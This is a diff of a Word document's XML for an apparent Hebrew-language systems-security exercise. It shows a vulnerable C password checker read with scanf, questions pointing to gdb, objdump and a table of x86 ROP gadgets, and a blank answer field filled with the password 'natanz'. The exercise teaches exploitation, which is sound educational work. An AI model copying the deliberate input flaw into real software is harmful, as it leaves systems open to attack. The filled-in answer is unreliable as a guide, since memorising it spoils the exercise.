+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>'</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3636,6 +3975,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3664,6 +4004,7 @@
         </w:rPr>
         <w:t>         </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3682,7 +4023,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(x</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>x</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3792,6 +4144,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3812,6 +4165,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3888,6 +4242,7 @@
         </w:rPr>
         <w:t>         </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -3906,7 +4261,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(y &gt;</w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>y &gt;</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3996,6 +4362,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4016,6 +4383,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4100,7 +4468,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 26y + *s</w:t>
+        <w:t xml:space="preserve"> 26y + </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>x</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4112,6 +4491,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4138,8 +4518,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>         s++;</w:t>
-      </w:r>
+        <w:t>         s+</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>+;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4234,7 +4626,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:val="en-US" w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>y == hash</w:t>
+        <w:t xml:space="preserve">y == </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>hash</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4246,6 +4649,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4347,6 +4751,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> הנכונה שתגרום לפונקציה </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -4354,6 +4759,7 @@
         </w:rPr>
         <w:t>checkPassword</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:cstheme="minorHAnsi"/>
@@ -4406,27 +4812,10 @@
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:b/>
           <w:bCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>___________</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>_____________________</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>_____</w:t>
+          <w:highlight w:val="yellow"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>natanz</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4661,7 +5050,29 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> main(){</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>main(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>){</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4704,8 +5115,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> password[</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>password[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4747,8 +5170,32 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>    printf(</w:t>
-      </w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4790,8 +5237,32 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>    scanf(</w:t>
-      </w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>scanf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4853,8 +5324,42 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>(checkPassword(password)){</w:t>
-      </w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>checkPassword</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(password</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>)){</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4876,8 +5381,32 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>        printf(</w:t>
-      </w:r>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4896,8 +5425,20 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>, password);</w:t>
-      </w:r>
+        <w:t>, password</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>);</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4941,6 +5482,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -4961,6 +5503,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5005,8 +5548,32 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t>    printf(</w:t>
-      </w:r>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>printf</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5017,6 +5584,7 @@
         </w:rPr>
         <w:t>"wrong password! After 3 wrong passwords this program will destroy the computer. Good luck. \n"</w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
@@ -5027,6 +5595,7 @@
         </w:rPr>
         <w:t>);</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5068,7 +5637,18 @@
           <w:szCs w:val="21"/>
           <w:lang w:eastAsia="en-IL"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="en-IL"/>
+        </w:rPr>
+        <w:t>-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5090,6 +5670,7 @@
         </w:rPr>
         <w:t>;</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -5152,6 +5733,7 @@
         </w:rPr>
         <w:t xml:space="preserve">הסבירו בקצרה מה הבעיה בקריאה של התוכנית ל </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5162,6 +5744,7 @@
         </w:rPr>
         <w:t>scanf</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5491,7 +6074,31 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">לפתרון הסעיף מומלץ להסתכל בקוד אסמבלי של </w:t>
+        <w:t xml:space="preserve">לפתרון הסעיף מומלץ להסתכל בקוד </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>אסמבלי</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:rtl/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> של </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5514,6 +6121,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> או להשתמש ב־</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5524,6 +6132,7 @@
         </w:rPr>
         <w:t>gdb</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5847,6 +6456,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> להיעזר ב </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -5857,6 +6467,7 @@
         </w:rPr>
         <w:t>objdump</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Strong"/>
@@ -6146,8 +6757,20 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>op %rdi</w:t>
+              <w:t>op %</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>rdi</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -6232,6 +6855,7 @@
                 <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -6242,6 +6866,7 @@
               </w:rPr>
               <w:t>syscall</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -6312,8 +6937,20 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>pop %rax</w:t>
+              <w:t>pop %</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>rax</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -6416,8 +7053,20 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>op %rsi</w:t>
+              <w:t>op %</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>rsi</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -6559,8 +7208,9 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>dd %r15, %r</w:t>
+              <w:t>dd %r15, %</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -6569,7 +7219,7 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>d</w:t>
+              <w:t>r</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -6579,8 +7229,19 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
+              <w:t>d</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
               <w:t>i</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
           <w:p>
             <w:pPr>
@@ -6693,11 +7354,10 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>ush %rbp</w:t>
+              <w:t>ush %</w:t>
             </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -6705,8 +7365,12 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
+              <w:t>rbp</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -6714,8 +7378,7 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>m</w:t>
-            </w:r>
+            </w:pPr>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -6724,11 +7387,9 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>ov %rsp, %rbp</w:t>
+              <w:t>m</w:t>
             </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
+            <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -6736,7 +7397,9 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-            </w:pPr>
+              <w:t>ov %</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -6745,8 +7408,9 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>c</w:t>
+              <w:t>rsp</w:t>
             </w:r>
+            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -6755,8 +7419,9 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t xml:space="preserve">all </w:t>
+              <w:t>, %</w:t>
             </w:r>
+            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
@@ -6765,9 +7430,12 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>*</w:t>
+              <w:t>rbp</w:t>
             </w:r>
-            <w:r>
+            <w:proofErr w:type="spellEnd"/>
+          </w:p>
+          <w:p>
+            <w:pPr>
               <w:rPr>
                 <w:rStyle w:val="Strong"/>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
@@ -6775,8 +7443,59 @@
                 <w:bCs w:val="0"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t>%rax</w:t>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>c</w:t>
             </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">all </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>*</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>%</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Strong"/>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
+                <w:b w:val="0"/>
+                <w:bCs w:val="0"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>rax</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -6923,8 +7642,21 @@
           <w:rtl/>
           <w:lang w:val="en-US"/>
         </w:rPr>
